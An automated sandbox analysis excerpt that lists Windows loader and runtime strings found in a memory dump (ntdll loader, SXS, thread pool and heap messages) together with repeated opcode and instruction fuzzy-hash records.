                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                          • String ID:
                                          • API String ID: 1404860816-0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                          • API String ID: 0-379654539
                                          Strings
                                          • @, xrefs: 012D8591
                                          • minkernel\ntdll\ldrinit.c, xrefs: 012D8421
                                          • LdrpInitializeProcess, xrefs: 012D8422
                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 012D855E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1918872054
                                          Strings
                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 013121D9, 013122B1
                                          • SXS: %s() passed the empty activation context, xrefs: 013121DE
                                          • .Local, xrefs: 012D28D8
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 013122B6
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                          • API String ID: 0-1239276146
                                          Strings
                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 013010AE
                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01300FE5
                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01301028
                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0130106B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                          • API String ID: 0-1468400865
                                          Strings
                                          • LdrpDynamicShimModule, xrefs: 0130A998
                                          • apphelp.dll, xrefs: 012C2462
                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0130A992
                                          • minkernel\ntdll\ldrinit.c, xrefs: 0130A9A2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-176724104
                                          Strings
                                          • HEAP[%wZ]: , xrefs: 012B3255
                                          • HEAP: , xrefs: 012B3264
                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 012B327D
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                          • API String ID: 0-617086771
                                          Similarity
                                          • API ID:
                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-4253913091
                                          Similarity
                                          • API ID:
                                          • String ID: $@
                                          • API String ID: 0-1077428164
                                          Similarity
                                          • API ID:
                                          • String ID: FilterFullPath$UseFilter$\??\
                                          • API String ID: 0-2779062949
                                          Strings
                                          • Failed to reallocate the system dirs string !, xrefs: 013182D7
                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 013182DE
                                          • minkernel\ntdll\ldrinit.c, xrefs: 013182E8
                                          Similarity
                                          • API ID:
                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1783798831
                                          Strings
                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0135C1C5
                                          • PreferredUILanguages, xrefs: 0135C212
                                          • @, xrefs: 0135C1F1
                                          Similarity
                                          • API ID:
                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                          • API String ID: 0-2968386058
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                          • API String ID: 0-1373925480
                                          Strings
                                          • LdrpCheckRedirection, xrefs: 0132488F
                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01324888
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01324899
                                          Similarity
                                          • API ID:
                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-3154609507
                                          Strings
                                          • LdrpInitializationFailure, xrefs: 013220FA
                                          • Process initialization failed with status 0x%08lx, xrefs: 013220F3
                                          • minkernel\ntdll\ldrinit.c, xrefs: 01322104
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2986994758
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: #%u
                                          • API String ID: 48624451-232158463
                                          Strings
                                          • LdrResSearchResource Exit, xrefs: 012AAA25
                                          • LdrResSearchResource Enter, xrefs: 012AAA13
                                          Similarity
                                          • API ID:
                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                          • API String ID: 0-4066393604
                                          Similarity
                                          • API ID:
                                          • String ID: `$`
                                          • API String ID: 0-197956300
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          Similarity
                                          • API ID:
                                          • String ID: @$MUI
                                          • API String ID: 0-17815947
                                          Strings
                                          • kLsE, xrefs: 012A0540
                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 012A063D
                                          Similarity
                                          • API ID:
                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                          • API String ID: 0-2547482624
                                          Strings
                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 012AA309
                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 012AA2FB
                                          Similarity
                                          • API ID:
                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                          • API String ID: 0-2876891731
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Cleanup Group$Threadpool!
                                          • API String ID: 2994545307-4008356553
                                          Similarity
                                          • API ID:
                                          • String ID: MUI
                                          • API String ID: 0-1339004836
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalTags
                                          • API String ID: 0-1106856819
                                          Similarity
                                          • API ID:
                                          • String ID: .mui
                                          • API String ID: 0-1199573805
                                          Similarity
                                          • API ID:
                                          • String ID: EXT-
                                          • API String ID: 0-1948896318
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          Similarity
                                          • API ID:
                                          • String ID: #
                                          • API String ID: 0-1885708031
                                          Strings
                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0132895E
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                          • API String ID: 0-702105204
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0b2e0f3fcd1f2f3966831417013c26cec9913f3081575089d9c99b332b98fd3f
                                          • Instruction ID: 9d107c6a7e9f155c03d3800a7e0781b4d36df49f84a4b53381f93b3b898e047f
                                          • Opcode Fuzzy Hash: 0b2e0f3fcd1f2f3966831417013c26cec9913f3081575089d9c99b332b98fd3f
                                          • Instruction Fuzzy Hash: DF5187716083428FD750DF29D880A6BBBE5BFC8A08F444A3DF589C7250EB30E915CB92
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                          • Instruction ID: 2cdcd0fa8b5190362ab9eca24f30df5d9d4b406951ab26ffc585ac89f1bdd321
                                          • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                          • Instruction Fuzzy Hash: EC519F75E1024AABDF16EF94C860BFFBBB5AF44B54F044269EA01AB240D774D944CBA0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                          • Instruction ID: c4f765e25a90e2a8939d8250025d36391843e0fcc7665279afd803b4b8dce483
                                          • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                          • Instruction Fuzzy Hash: F051BA71D0422AEFEF11AF98C896BAEBBB9AF00318F154675D61267190D7709D40CBA0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0a4d1d5cebed1faea439611804384b05d7d477575b972c17f36bd6397765fcc1
                                          • Instruction ID: 958baf0fcca350d31e9d8f765a2372cde0167ee0bac8b22ce20ea97ba90044a0
                                          • Opcode Fuzzy Hash: 0a4d1d5cebed1faea439611804384b05d7d477575b972c17f36bd6397765fcc1
                                          • Instruction Fuzzy Hash: F441D4B07017019BDB29DB2DC894B7BFB9EEF98228F04C659E9559728CDB70D801C691
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2cbf9a3be8dd64cf91a788b88002d9c46634af51a8e8a6cf455a30b597ef831e
                                          • Instruction ID: b826430f3de4fb503b5adf406514840fc03bd78bc0a3fabcd3abf135b418dd35
                                          • Opcode Fuzzy Hash: 2cbf9a3be8dd64cf91a788b88002d9c46634af51a8e8a6cf455a30b597ef831e
                                          • Instruction Fuzzy Hash: 5A412B72660206DBDF29EFA8E883F7A7769EB5871CF41046CEE429B245D7B2D810C750
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                          • Instruction ID: fa460c58a5150c77ce946287a89193826a4ada1e3d0e6c5b95bbd5cea02674ba
                                          • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                          • Instruction Fuzzy Hash: D441E5716107169FEB25CF28C984A6EB7ADFF80318B05C62EE95297648EB30ED14C7D0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d13185bd8c80a0f387e9285c5138b4752c396becbf11ca09441e1855d42333a3
                                          • Instruction ID: a8bdf8f0763995cab4c24797d653e0df2f2d9d2a4f0ce74d825094e28dc75df0
                                          • Opcode Fuzzy Hash: d13185bd8c80a0f387e9285c5138b4752c396becbf11ca09441e1855d42333a3
                                          • Instruction Fuzzy Hash: 5A41BA36E2121ADBDB14DF98C440AEEBBB4BF48714F14816AF915E7360DB749C41CBA8
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                          • Instruction ID: 87e817460f9b9d38c600d29f1c779d7091c2c5e2ba397fc04abd61e026a550d5
                                          • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                          • Instruction Fuzzy Hash: 1E519B75A01259CFCB19CF9CC480AAEF7B2FF84714F2485A9D815A7355D730AE42CB90
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c77653cfdab6bb67168b4ef4957b498c61232beee3cabd700817afde147b681e
                                          • Instruction ID: 8cdb89f2a7f209e56ffd543dc88860a9e85b4ba8d1f150f54461ff0ca5cc7d89
                                          • Opcode Fuzzy Hash: c77653cfdab6bb67168b4ef4957b498c61232beee3cabd700817afde147b681e
                                          • Instruction Fuzzy Hash: B0512AB0910217DBDB2ACB28CC55BF8BBB5FF11318F4842A9D5259B6D1D7746981CF40
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                          • Instruction ID: 81634d7a8186f8203479143dc18f25d58d3b396749ce50258e4aa4b7071c9514
                                          • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                          • Instruction Fuzzy Hash: 6F41B575B10305ABEB15DF9DCC84AAFBBBEAF8C658F1480A9EA00A7345D674DD008760
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f643f1e837fb39ff1d9549d382f26e74f9e3fb916f42eaed83665a7a5e866edb
                                          • Instruction ID: 2a5841b02f2a6ca6d4c5a64ee95e4c3cfbc947b260076b5a1e1d15be828c2093
                                          • Opcode Fuzzy Hash: f643f1e837fb39ff1d9549d382f26e74f9e3fb916f42eaed83665a7a5e866edb
                                          • Instruction Fuzzy Hash: 3D41C1B16207039FE325CF28C480A26BBF9FF48714B504A6DE65787A50E770F845CB98
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1fc5e813fcf795b185e48861a707fc3cbe2fb6f4fb57ebb8571e4eb41d3a2be6
                                          • Instruction ID: 35edb5ad94bbfd021256becd962b7eb2e44ceaf7702ea1f777a453a69f26782b
                                          • Opcode Fuzzy Hash: 1fc5e813fcf795b185e48861a707fc3cbe2fb6f4fb57ebb8571e4eb41d3a2be6
                                          • Instruction Fuzzy Hash: 3A411432A6420ACFDB25CF68E5987FD7BB4FB14794F044269D612A7280EB759901CBA0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 14c6bb98505cb15513a8dc53819fe9e1aae8d9436273922a1edf8c9d96b23813
                                          • Instruction ID: 0fa8e0421a62a3322c325240455126735af58993d7beea8cb7af75e656dd0a19
                                          • Opcode Fuzzy Hash: 14c6bb98505cb15513a8dc53819fe9e1aae8d9436273922a1edf8c9d96b23813
                                          • Instruction Fuzzy Hash: 124180325283069EE712DF69C841A6BF7E9EF85B54F44092EFA84D7250E770DE048B93
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                          • Instruction ID: a8c9f661d3eb0a867669835cb329c37ebd2da5d9b25ef8665a4579468dbecde7
                                          • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                          • Instruction Fuzzy Hash: 92411331A20313DBDF25DE2CC4917BAFB71AB94754F15817EBB459B240D6728D808B90
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fe0678bf33f7a0b0ce44c45227774a5c811dceb534d6622eef51c55bf9ca7e29
                                          • Instruction ID: eb840854badf84e353ad6da3665e8710ec5e092cd2825694ec5d273757c3a74b
                                          • Opcode Fuzzy Hash: fe0678bf33f7a0b0ce44c45227774a5c811dceb534d6622eef51c55bf9ca7e29
                                          • Instruction Fuzzy Hash: 11416971620702EFD721CF18C880B66BBF4FF54714F618A2AE6498B252E771E9428B94
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                          • Instruction ID: fa6858c5776193b4fc2588181a7d2dacd5be0e2ecb0764bb4faf99eaacd96964
                                          • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                          • Instruction Fuzzy Hash: 6C412871A10605EFDB24CF99C981AAABBF9EF18700F10496DE656DB260D370EA44CF54
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d51bbc3ae92a0baa0166474a77210a382777704a8c78d3bccb5dee927803694e
                                          • Instruction ID: ccfc81e0d78dfe3ffb1ae3eaa0a123cfd4057a55a74a7601cd746c7094fca7bf
                                          • Opcode Fuzzy Hash: d51bbc3ae92a0baa0166474a77210a382777704a8c78d3bccb5dee927803694e
                                          • Instruction Fuzzy Hash: FC4104B1922702CFCB26EF28C941B69BBF5FF44714F5082ADC6169B6A1DB309A41CF41
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b9df843c7b68e1a3731d1482bbefe7e65fd6f2c0db76161e2a72899e990629d8
                                          • Instruction ID: 0d85424935162dff1d64386afc6d2defc5d036cec1a991b57aacab3d9a198823
                                          • Opcode Fuzzy Hash: b9df843c7b68e1a3731d1482bbefe7e65fd6f2c0db76161e2a72899e990629d8
                                          • Instruction Fuzzy Hash: 833159B1A11346DFDB12CF58C4407A9BBF0EB09728F2085AED119EB251D7769942CB94
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7579b34cbe17c49f91c44ebd4418f43ff71a8ac39bc2041e1162d4c9a9e5409a
                                          • Instruction ID: a34ab1073f9ed76b96152da43b78e2f1ba2388ba2627935c0ed380ae654618a6
                                          • Opcode Fuzzy Hash: 7579b34cbe17c49f91c44ebd4418f43ff71a8ac39bc2041e1162d4c9a9e5409a
                                          • Instruction Fuzzy Hash: 60417BB15143519FD760EF29C845BABBBE8FF88714F004A2EF598C7290D7709904CB92
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e4edc8c27f462ef5ac249966b0ec7314d3262da6e825b94908d4975c41c892cf
                                          • Instruction ID: f65da4cf1ecfe03f57cd85e8cdd9d3383449fe27ed09d310ea3c09a0394617c7
                                          • Opcode Fuzzy Hash: e4edc8c27f462ef5ac249966b0ec7314d3262da6e825b94908d4975c41c892cf
                                          • Instruction Fuzzy Hash: 564103B1E2461AEFCF01DF1CC980AA8B7B1FF15760F188229D915A7280D774ED418BD0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 693323b50b85a1045b4380e96aba0e9d9179e42d903207188aed6ac239b2518e
                                          • Instruction ID: d90a2a1b51551bc66e6808efa0e2f57c3c3f55e47fec7ba8375a378863ca5cc6
                                          • Opcode Fuzzy Hash: 693323b50b85a1045b4380e96aba0e9d9179e42d903207188aed6ac239b2518e
                                          • Instruction Fuzzy Hash: 1741D4726046529FD324EF6CD880A7AB7E9FFC8704F14461DF99497680E730E908C7A6
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1df51bdc80e7f8bdd3bfc314732d7565e63e649d9d6af6230f6520ed5847c235
                                          • Instruction ID: 81cccb4f2494ba996ad1104ad107c50519b681bd80ade7fb0b54770abeb39184
                                          • Opcode Fuzzy Hash: 1df51bdc80e7f8bdd3bfc314732d7565e63e649d9d6af6230f6520ed5847c235
                                          • Instruction Fuzzy Hash: 3241E3702203438FD725EF2CD884B3ABBE9EF80354F58442DE641872A1D7B0D865CB91
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                          • Instruction ID: 926c956d8cde91ae0d0c59d3abe35c7347252363bb12417c871fdc7a25737b0c
                                          • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                          • Instruction Fuzzy Hash: 08312731A25245AFDB12CB68CC84BEBBFF8AF14390F048165F815D7392D6B49984CBA4
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e5da887861f360cc582345fc7100e71655b9eb4aa3555686dc2206bb0d9df6a3
                                          • Instruction ID: 35bffded7f9404dc19af3c8955c5b034476633a0038e20e58ff2e94a12f2f1e1
                                          • Opcode Fuzzy Hash: e5da887861f360cc582345fc7100e71655b9eb4aa3555686dc2206bb0d9df6a3
                                          • Instruction Fuzzy Hash: A6317835750716ABD7229F599C81FAB77E9BB58B54F000038F600BB391DA68ED008790
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d39ac30e0f234ee76e6950c45e0a770277314ba772f7d0dc1ec58c36b8201788
                                          • Instruction ID: afb4ec08d11a43453eb25da8b92fbfeeee79e594a4dcc01c1b66e7a81dcadf49
                                          • Opcode Fuzzy Hash: d39ac30e0f234ee76e6950c45e0a770277314ba772f7d0dc1ec58c36b8201788
                                          • Instruction Fuzzy Hash: 7A41AE71210B45DFD726DF28C891FE77BE9BF44358F148429EA998B290C7B4E800CB90
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf41357acb1b9eb02dcd47787794f8c9cb55873ed9df147bd4ea27bc39a5c9b0
                                          • Instruction ID: d2d6a76a62f4934be4c8e2693384ce970b93395664039d9e9c96964ff0171702
                                          • Opcode Fuzzy Hash: bf41357acb1b9eb02dcd47787794f8c9cb55873ed9df147bd4ea27bc39a5c9b0
                                          • Instruction Fuzzy Hash: 673106723056869BF72B9B5CCD88B657BD8BF40B88F1D44B0EF419B6D5DB29D840C220
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
